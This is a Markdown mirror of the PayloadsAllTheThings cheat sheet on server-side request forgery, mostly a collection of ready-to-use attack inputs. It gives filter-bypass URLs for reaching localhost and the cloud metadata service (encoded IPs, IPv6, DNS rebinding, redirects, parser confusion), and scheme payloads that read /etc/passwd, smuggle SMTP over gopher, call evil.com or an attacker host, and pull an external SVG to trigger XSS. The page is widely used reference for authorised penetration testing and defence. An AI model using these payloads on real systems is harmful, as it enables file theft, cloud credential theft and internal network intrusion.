index.md (21000B)
1 --- 2 title: "Server-Side Request Forgery" 3 topic: "Server Side Request Forgery" 4 topicSlug: "server-side-request-forgery" 5 sourcePath: "Server Side Request Forgery/README.md" 6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/Server%20Side%20Request%20Forgery/README.md" 7 sha: "3ac27901c711" 8 isReadme: true 9 --- 10 11 # Server-Side Request Forgery 12 13 > Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf. 14 15 ## Summary 16 17 * [Tools](#tools) 18 * [Methodology](#methodology) 19 * [Bypassing Filters](#bypassing-filters) 20 * [Default Targets](#default-targets) 21 * [Bypass Localhost with IPv6 Notation](#bypass-localhost-with-ipv6-notation) 22 * [Bypass Localhost with a Domain Redirect](#bypass-localhost-with-a-domain-redirect) 23 * [Bypass Localhost with CIDR](#bypass-localhost-with-cidr) 24 * [Bypass Using Rare Address](#bypass-using-rare-address) 25 * [Bypass Using an Encoded IP Address](#bypass-using-an-encoded-ip-address) 26 * [Bypass Using Different Encoding](#bypass-using-different-encoding) 27 * [Bypassing Using a Redirect](#bypassing-using-a-redirect) 28 * [Bypass Using DNS Rebinding](#bypass-using-dns-rebinding) 29 * [Bypass Abusing URL Parsing Discrepancy](#bypass-abusing-url-parsing-discrepancy) 30 * [Bypass PHP filter_var() Function](#bypass-php-filter_var-function) 31 * [Bypass Using JAR Scheme](#bypass-using-jar-scheme) 32 * [Bypass Using TLD localhost](#bypass-using-tld-localhost) 33 * [Exploitation via URL Scheme](#exploitation-via-url-scheme) 34 * [file://](#file) 35 * [http://](#http) 36 * [dict://](#dict) 37 * [sftp://](#sftp) 38 * [tftp://](#tftp) 39 * [ldap://](#ldap) 40 * [gopher://](#gopher) 41 * [netdoc://](#netdoc) 42 * [Blind Exploitation](#blind-exploitation) 43 * [Upgrade to XSS](#upgrade-to-xss) 44 * [Labs](#labs) 45 * [References](#references) 46 47 ## Tools 48 49 * [swisskyrepo/SSRFmap](https://github.com/swisskyrepo/SSRFmap) - Automatic SSRF fuzzer and exploitation tool 50 * [tarunkant/Gopherus](https://github.com/tarunkant/Gopherus) - Generates gopher link for exploiting SSRF and gaining RCE in various servers 51 * [In3tinct/See-SURF](https://github.com/In3tinct/See-SURF) - Python based scanner to find potential SSRF parameters 52 * [teknogeek/SSRF-Sheriff](https://github.com/teknogeek/ssrf-sheriff) - Simple SSRF-testing sheriff written in Go 53 * [assetnote/surf](https://github.com/assetnote/surf) - Returns a list of viable SSRF candidates 54 * [dwisiswant0/ipfuscator](https://github.com/dwisiswant0/ipfuscator) - A blazing-fast, thread-safe, straightforward and zero memory allocations tool to swiftly generate alternative IP(v4) address representations in Go. 55 * [Horlad/r3dir](https://github.com/Horlad/r3dir) - a redirection service designed to help bypass SSRF filters that do not validate the redirect location. Intergrated with Burp with help of Hackvertor tags 56 57 ## Methodology 58 59 SSRF is a security vulnerability that occurs when an attacker manipulates a server to make HTTP requests to an unintended location. This happens when the server processes user-provided URLs or IP addresses without proper validation. 60 61 Common exploitation paths: 62 63 * Accessing Cloud metadata 64 * Leaking files on the server 65 * Network discovery, port scanning with the SSRF 66 * Sending packets to specific services on the network, usually to achieve a Remote Command Execution on another server 67 68 **Example**: A server accepts user input to fetch a URL. 69 70 ```py 71 url = input("Enter URL:") 72 response = requests.get(url) 73 return response 74 ``` 75 76 An attacker supplies a malicious input: 77 78 ```ps1 79 http://169.254.169.254/latest/meta-data/ 80 ``` 81 82 This fetches sensitive information from the AWS EC2 metadata service. 83 84 ## Bypassing Filters 85 86 ### Default Targets 87 88 By default, Server-Side Request Forgery are used to access services hosted on `localhost` or hidden further on the network. 89 90 * Using `localhost` 91 92 ```powershell 93 http://localhost:80 94 http://localhost:22 95 https://localhost:443 96 ``` 97 98 * Using `127.0.0.1` 99 100 ```powershell 101 http://127.0.0.1:80 102 http://127.0.0.1:22 103 https://127.0.0.1:443 104 ``` 105 106 * Using `0.0.0.0` 107 108 ```powershell 109 http://0.0.0.0:80 110 http://0.0.0.0:22 111 https://0.0.0.0:443 112 ``` 113 114 ### Bypass Localhost with IPv6 Notation 115 116 * Using unspecified address in IPv6 `[::]` 117 118 ```powershell 119 http://[::]:80/ 120 ``` 121 122 * Using IPv6 loopback addres`[0000::1]` 123 124 ```powershell 125 http://[0000::1]:80/ 126 ``` 127 128 * Using [IPv6/IPv4 Address Embedding](http://www.tcpipguide.com/free/t_IPv6IPv4AddressEmbedding.htm) 129 130 ```powershell 131 http://[0:0:0:0:0:ffff:127.0.0.1] 132 http://[::ffff:127.0.0.1] 133 ``` 134 135 ### Bypass Localhost with a Domain Redirect 136 137 | Domain | Redirect to | 138 |------------------------------|-------------| 139 | localtest.me | `::1` | 140 | localh.st | `127.0.0.1` | 141 | spoofed.[BURP_COLLABORATOR] | `127.0.0.1` | 142 | spoofed.redacted.oastify.com | `127.0.0.1` | 143 | company.127.0.0.1.nip.io | `127.0.0.1` | 144 145 The service `nip.io` is awesome for that, it will convert any ip address as a dns. 146 147 ```powershell 148 NIP.IO maps <anything>.<IP Address>.nip.io to the corresponding <IP Address>, even 127.0.0.1.nip.io maps to 127.0.0.1 149 ``` 150 151 ### Bypass Localhost with CIDR 152 153 The IP range `127.0.0.0/8` in IPv4 is reserved for loopback addresses. 154 155 ```powershell 156 http://127.127.127.127 157 http://127.0.1.3 158 http://127.0.0.0 159 ``` 160 161 If you try to use any address in this range (127.0.0.2, 127.1.1.1, etc.) in a network, it will still resolve to the local machine 162 163 ### Bypass Using Rare Address 164 165 You can short-hand IP addresses by dropping the zeros 166 167 ```powershell 168 http://0/ 169 http://127.1 170 http://127.0.1 171 ``` 172 173 ### Bypass Using an Encoded IP Address 174 175 * Decimal IP location 176 177 ```powershell 178 http://2130706433/ = http://127.0.0.1 179 http://3232235521/ = http://192.168.0.1 180 http://3232235777/ = http://192.168.1.1 181 http://2852039166/ = http://169.254.169.254 182 ``` 183 184 * Octal IP: Implementations differ on how to handle octal format of IPv4. 185 186 ```powershell 187 http://0177.0.0.1/ = http://127.0.0.1 188 http://o177.0.0.1/ = http://127.0.0.1 189 http://0o177.0.0.1/ = http://127.0.0.1 190 http://q177.0.0.1/ = http://127.0.0.1 191 ``` 192 193 * Hex IP 194 195 ```powershell 196 http://0x7f000001 = http://127.0.0.1 197 http://0xc0a80101 = http://192.168.1.1 198 http://0xa9fea9fe = http://169.254.169.254 199 ``` 200 201 ### Bypass Using Different Encoding 202 203 * URL encoding: Single or double encode a specific URL to bypass blacklist 204 205 ```powershell 206 http://127.0.0.1/%61dmin 207 http://127.0.0.1/%2561dmin 208 ``` 209 210 * Enclosed alphanumeric: `①②③④⑤⑥⑦⑧⑨⑩⑪⑫⑬⑭⑮⑯⑰⑱⑲⑳⑴⑵⑶⑷⑸⑹⑺⑻⑼⑽⑾⑿⒀⒁⒂⒃⒄⒅⒆⒇⒈⒉⒊⒋⒌⒍⒎⒏⒐⒑⒒⒓⒔⒕⒖⒗⒘⒙⒚⒛⒜⒝⒞⒟⒠⒡⒢⒣⒤⒥⒦⒧⒨⒩⒪⒫⒬⒭⒮⒯⒰⒱⒲⒳⒴⒵ⒶⒷⒸⒹⒺⒻⒼⒽⒾⒿⓀⓁⓂⓃⓄⓅⓆⓇⓈⓉⓊⓋⓌⓍⓎⓏⓐⓑⓒⓓⓔⓕⓖⓗⓘⓙⓚⓛⓜⓝⓞⓟⓠⓡⓢⓣⓤⓥⓦⓧⓨⓩ⓪⓫⓬⓭⓮⓯⓰⓱⓲⓳⓴⓵⓶⓷⓸⓹⓺⓻⓼⓽⓾⓿` 211 212 ```powershell 213 http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com 214 ``` 215 216 * Unicode encoding: In some languages (.NET, Python 3) regex supports unicode by default. `\d` includes `0123456789` but also `๐๑๒๓๔๕๖๗๘๙`. 217 218 ### Bypassing via ipv6 hostname 219 220 * in Linux /etc/hosts contain this line `::1 localhost ip6-localhost ip6-loopback` but work only if http server running in ipv6 221 222 ```powershell 223 http://ip6-localhost = ::1 224 http://ip6-loopback = ::1 225 ``` 226 227 ### Bypassing Using a Redirect 228 229 1. Create a page on a whitelisted host that redirects requests to the SSRF the target URL (e.g. 192.168.0.1) 230 2. Launch the SSRF pointing to `vulnerable.com/index.php?url=http://redirect-server` 231 3. You can use response codes [HTTP 307](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/307) and [HTTP 308](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/308) in order to retain HTTP method and body after the redirection. 232 233 To perform redirects without hosting own redirect server or perform seemless redirect target fuzzing, use [Horlad/r3dir](https://github.com/Horlad/r3dir). 234 235 * Redirects to `http://localhost` with `307 Temporary Redirect` status code 236 237 ```powershell 238 https://307.r3dir.me/--to/?url=http://localhost 239 ``` 240 241 * Redirects to `http://169.254.169.254/latest/meta-data/` with `302 Found` status code 242 243 ```powershell 244 https://62epax5fhvj3zzmzigyoe5ipkbn7fysllvges3a.302.r3dir.me 245 ``` 246 247 ### Bypass Using DNS Rebinding 248 249 Create a domain that change between two IPs. 250 251 * [1u.ms](http://1u.ms) - DNS rebinding utility 252 253 For example to rotate between `1.2.3.4` and `169.254-169.254`, use the following domain: 254 255 ```powershell 256 make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms 257 ``` 258 259 Verify the address with `nslookup`. 260 261 ```ps1 262 $ nslookup make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms 263 Name: make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms 264 Address: 1.2.3.4 265 266 $ nslookup make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms 267 Name: make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms 268 Address: 169.254.169.254 269 ``` 270 271 ### Bypass Abusing URL Parsing Discrepancy 272 273 [A New Era Of SSRF Exploiting URL Parser In Trending Programming Languages - Research from Orange Tsai](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf) 274 275 ```powershell 276 http://127.1.1.1:80\@127.2.2.2:80/ 277 http://127.1.1.1:80\@@127.2.2.2:80/ 278 http://127.1.1.1:80:\@@127.2.2.2:80/ 279 http://127.1.1.1:80#\@127.2.2.2:80/ 280 http:127.0.0.1/ 281 ``` 282 283  284 285 Parsing behavior by different libraries: `http://1.1.1.1 &@2.2.2.2# @3.3.3.3/`. 286 287 * `urllib2` treats `1.1.1.1` as the destination 288 * `requests` and browsers redirect to `2.2.2.2` 289 * `urllib` resolves to `3.3.3.3` 290 * Some parsers replace `http:127.0.0.1/` to `http://127.0.0.1/` 291 292 ### Bypass PHP filter_var() Function 293 294 In PHP 7.0.25, `filter_var()` function with the parameter `FILTER_VALIDATE_URL` allows URL such as: 295 296 * `http://test???test.com` 297 * `0://evil.com:80;http://google.com:80/` 298 299 ```php 300 <?php 301 echo var_dump(filter_var("http://test???test.com", FILTER_VALIDATE_URL)); 302 echo var_dump(filter_var("0://evil.com;google.com", FILTER_VALIDATE_URL)); 303 ?> 304 ``` 305 306 ### Bypass Using TLD localhost 307 308 There was a reserved tld called `.localhost`, it can accept arbiratry domains and resolves to the localhost ip, here is an example 309 310 ```powershell 311 $ ping PayloadsAllTheThings.localhost -c 1 312 PING PayloadsAllTheThings.localhost (::1) 56 data bytes 313 64 bytes from ip6-localhost (::1): icmp_seq=1 ttl=64 time=0.070 ms 314 315 --- PayloadsAllTheThings.localhost ping statistics --- 316 1 packets transmitted, 1 received, 0% packet loss, time 0ms 317 rtt min/avg/max/mdev = 0.070/0.070/0.070/0.000 ms 318 ``` 319 320 ### Bypass Using JAR Scheme 321 322 This attack technique is fully blind, you won't see the result. 323 324 ```powershell 325 jar:scheme://domain/path!/ 326 jar:http://127.0.0.1!/ 327 jar:https://127.0.0.1!/ 328 jar:ftp://127.0.0.1!/ 329 ``` 330 331 ## Exploitation via URL Scheme 332 333 ### File 334 335 Allows an attacker to fetch the content of a file on the server. Transforming the SSRF into a file read. 336 337 ```powershell 338 file:///etc/passwd 339 file://\/\/etc/passwd 340 ``` 341 342 ### HTTP 343 344 Allows an attacker to fetch any content from the web, it can also be used to scan ports. 345 346 ```powershell 347 ssrf.php?url=http://127.0.0.1:22 348 ssrf.php?url=http://127.0.0.1:80 349 ssrf.php?url=http://127.0.0.1:443 350 ``` 351 352  353 354 ### Dict 355 356 The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol: 357 358 ```powershell 359 dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n> 360 ssrf.php?url=dict://attacker:11111/ 361 ``` 362 363 ### SFTP 364 365 A network protocol used for secure file transfer over secure shell 366 367 ```powershell 368 ssrf.php?url=sftp://evil.com:11111/ 369 ``` 370 371 ### TFTP 372 373 Trivial File Transfer Protocol, works over UDP 374 375 ```powershell 376 ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET 377 ``` 378 379 ### LDAP 380 381 Lightweight Directory Access Protocol. It is an application protocol used over an IP network to manage and access the distributed directory information service. 382 383 ```powershell 384 ssrf.php?url=ldap://localhost:11211/%0astats%0aquit 385 ``` 386 387 ### Netdoc 388 389 Wrapper for Java when your payloads struggle with "`\n`" and "`\r`" characters. 390 391 ```powershell 392 ssrf.php?url=netdoc:///etc/passwd 393 ``` 394 395 ### Gopher 396 397 The `gopher://` protocol is a lightweight, text-based protocol that predates the modern World Wide Web. It was designed for distributing, searching, and retrieving documents over the Internet. 398 399 ```ps1 400 gopher://[host]:[port]/[type][selector] 401 ``` 402 403 This scheme is very useful as it as be used to send data to TCP protocol. 404 405 ```ps1 406 gopher://localhost:25/_MAIL%20FROM:<attacker@example.com>%0D%0A 407 ``` 408 409 Refer to the SSRF Advanced Exploitation to explore the `gopher://` protocol deeper. 410 411 ## Blind Exploitation 412 413 > When exploiting server-side request forgery, we can often find ourselves in a position where the response cannot be read. 414 415 Use an SSRF chain to gain an Out-of-Band output: [assetnote/blind-ssrf-chains](https://github.com/assetnote/blind-ssrf-chains) 416 417 **Possible via HTTP(s)**: 418 419 * [Elasticsearch](https://github.com/assetnote/blind-ssrf-chains#elasticsearch) 420 * [Weblogic](https://github.com/assetnote/blind-ssrf-chains#weblogic) 421 * [Hashicorp Consul](https://github.com/assetnote/blind-ssrf-chains#consul) 422 * [Shellshock](https://github.com/assetnote/blind-ssrf-chains#shellshock) 423 * [Apache Druid](https://github.com/assetnote/blind-ssrf-chains#druid) 424 * [Apache Solr](https://github.com/assetnote/blind-ssrf-chains#solr) 425 * [PeopleSoft](https://github.com/assetnote/blind-ssrf-chains#peoplesoft) 426 * [Apache Struts](https://github.com/assetnote/blind-ssrf-chains#struts) 427 * [JBoss](https://github.com/assetnote/blind-ssrf-chains#jboss) 428 * [Confluence](https://github.com/assetnote/blind-ssrf-chains#confluence) 429 * [Jira](https://github.com/assetnote/blind-ssrf-chains#jira) 430 * [Other Atlassian Products](https://github.com/assetnote/blind-ssrf-chains#atlassian-products) 431 * [OpenTSDB](https://github.com/assetnote/blind-ssrf-chains#opentsdb) 432 * [Jenkins](https://github.com/assetnote/blind-ssrf-chains#jenkins) 433 * [Hystrix Dashboard](https://github.com/assetnote/blind-ssrf-chains#hystrix) 434 * [W3 Total Cache](https://github.com/assetnote/blind-ssrf-chains#w3) 435 * [Docker](https://github.com/assetnote/blind-ssrf-chains#docker) 436 * [Gitlab Prometheus Redis Exporter](https://github.com/assetnote/blind-ssrf-chains#redisexporter) 437 438 **Possible via Gopher**: 439 440 * [Redis](https://github.com/assetnote/blind-ssrf-chains#redis) 441 * [Memcache](https://github.com/assetnote/blind-ssrf-chains#memcache) 442 * [Apache Tomcat](https://github.com/assetnote/blind-ssrf-chains#tomcat) 443 444 ## Upgrade to XSS 445 446 When the SSRF doesn't have any critical impact, the network is segmented and you can't reach other machine, the SSRF doesn't allow you to exfiltrate files from the server. 447 448 You can try to upgrade the SSRF to an XSS, by including an SVG file containing Javascript code. 449 450 ```bash 451 https://example.com/ssrf.php?url=http://brutelogic.com.br/poc.svg 452 ``` 453 454 ## Labs 455 456 * [PortSwigger - Basic SSRF against the local server](https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhost) 457 * [PortSwigger - Basic SSRF against another back-end system](https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-backend-system) 458 * [PortSwigger - SSRF with blacklist-based input filter](https://portswigger.net/web-security/ssrf/lab-ssrf-with-blacklist-filter) 459 * [PortSwigger - SSRF with whitelist-based input filter](https://portswigger.net/web-security/ssrf/lab-ssrf-with-whitelist-filter) 460 * [PortSwigger - SSRF with filter bypass via open redirection vulnerability](https://portswigger.net/web-security/ssrf/lab-ssrf-filter-bypass-via-open-redirection) 461 * [Root Me - Server Side Request Forgery](https://www.root-me.org/en/Challenges/Web-Server/Server-Side-Request-Forgery) 462 * [Root Me - Nginx - SSRF Misconfiguration](https://www.root-me.org/en/Challenges/Web-Server/Nginx-SSRF-Misconfiguration) 463 464 ## References 465 466 * [A New Era Of SSRF - Exploiting URL Parsers - Orange Tsai - September 27, 2017](https://web.archive.org/web/20171219113122/https://www.youtube.com/watch?v=D1S-G8rJrEk) 467 * [Blind SSRF on errors.hackerone.net - chaosbolt - June 30, 2018](https://web.archive.org/web/20180711141712/https://hackerone.com/reports/374737) 468 * [ESEA Server-Side Request Forgery and Querying AWS Meta Data - Brett Buerhaus - April 18, 2016](https://web.archive.org/web/20251203033430/https://buer.haus/2016/04/18/esea-server-side-request-forgery-and-querying-aws-meta-data/) 469 * [Hacker101 SSRF - Cody Brocious - October 29, 2018](https://web.archive.org/web/20240905134609/https://www.youtube.com/watch?v=66ni2BTIjS8) 470 * [Hackerone - How To: Server-Side Request Forgery (SSRF) - Jobert Abma - June 14, 2017](https://web.archive.org/web/20210805121112/https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF) 471 * [Hacking the Hackers: Leveraging an SSRF in HackerTarget - @sxcurity - December 17, 2017](http://web.archive.org/web/20171220083457/http://www.sxcurity.pro/2017/12/17/hackertarget/) 472 * [How I Chained 4 Vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! - Orange Tsai - July 28, 2017](https://web.archive.org/web/20260305031002/https://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html) 473 * [Les Server Side Request Forgery : Comment contourner un pare-feu - Geluchat - September 16, 2017](https://web.archive.org/web/20250514163556/https://www.dailysecurity.fr/server-side-request-forgery/) 474 * [PHP SSRF - @secjuice - theMiddle - March 1, 2018](https://web.archive.org/web/20180308041252/https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51) 475 * [Piercing the Veil: Server Side Request Forgery to NIPRNet Access - Alyssa Herrera - April 9, 2018](https://web.archive.org/web/20180418081910/https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a) 476 * [Server-side Browsing Considered Harmful - Nicolas Grégoire (Agarri) - May 21, 2015](https://web.archive.org/web/20260212042925/https://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf) 477 * [SSRF - Server-Side Request Forgery (Types and Ways to Exploit It) Part-1 - SaN ThosH (madrobot) - January 10, 2019](https://web.archive.org/web/20260111214124/https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978) 478 * [SSRF and Local File Read in Video to GIF Converter - sl1m - February 11, 2016](https://web.archive.org/web/20250426211714/https://hackerone.com/reports/115857) 479 * [SSRF in https://imgur.com/vidgif/url - Eugene Farfel (aesteral) - February 10, 2016](https://web.archive.org/web/20250905152736/https://hackerone.com/reports/115748) 480 * [SSRF in proxy.duckduckgo.com - Patrik Fábián (fpatrik) - May 27, 2018](https://web.archive.org/web/20250623102403/https://hackerone.com/reports/358119) 481 * [SSRF on *shopifycloud.com - Rojan Rijal (rijalrojan) - July 17, 2018](https://web.archive.org/web/20250623094825/https://hackerone.com/reports/382612) 482 * [SSRF Protocol Smuggling in Plaintext Credential Handlers: LDAP - Willis Vandevanter (@0xrst) - February 5, 2019](https://web.archive.org/web/20260115204744/https://www.silentrobots.com/ssrf-protocol-smuggling-in-plaintext-credential-handlers-ldap/) 483 * [SSRF Tips - xl7dev - July 3, 2016](http://web.archive.org/web/20170407053309/http://blog.safebuff.com/2016/07/03/SSRF-Tips/) 484 * [SSRF's Up! Real World Server-Side Request Forgery (SSRF) - Alberto Wilson and Guillermo Gabarrin - January 25, 2019](https://web.archive.org/web/20260219110439/https://www.shorebreaksecurity.com/blog/ssrfs-up-real-world-server-side-request-forgery-ssrf/) 485 * [SSRF脆弱性を利用したGCE/GKEインスタンスへの攻撃例 - mrtc0 - September 5, 2018](https://web.archive.org/web/20250717205545/https://blog.ssrf.in/post/example-of-attack-on-gce-and-gke-instance-using-ssrf-vulnerability/) 486 * [SVG SSRF Cheatsheet - Allan Wirth (@allanlw) - June 12, 2019](https://github.com/allanlw/svg-cheatsheet) 487 * [URL Eccentricities in Java - sammy (@PwnL0rd) - November 2, 2020](http://web.archive.org/web/20201107113541/https://blog.pwnl0rd.me/post/lfi-netdoc-file-java/) 488 * [Web Security Academy Server-Side Request Forgery (SSRF) - PortSwigger - July 10, 2019](https://web.archive.org/web/20190710130620/https://portswigger.net/web-security/ssrf) 489 * [X-CTF Finals 2016 - John Slick (Web 25) - YEO QUAN YANG (@quanyang) - June 22, 2016](https://web.archive.org/web/20260301043216/https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/)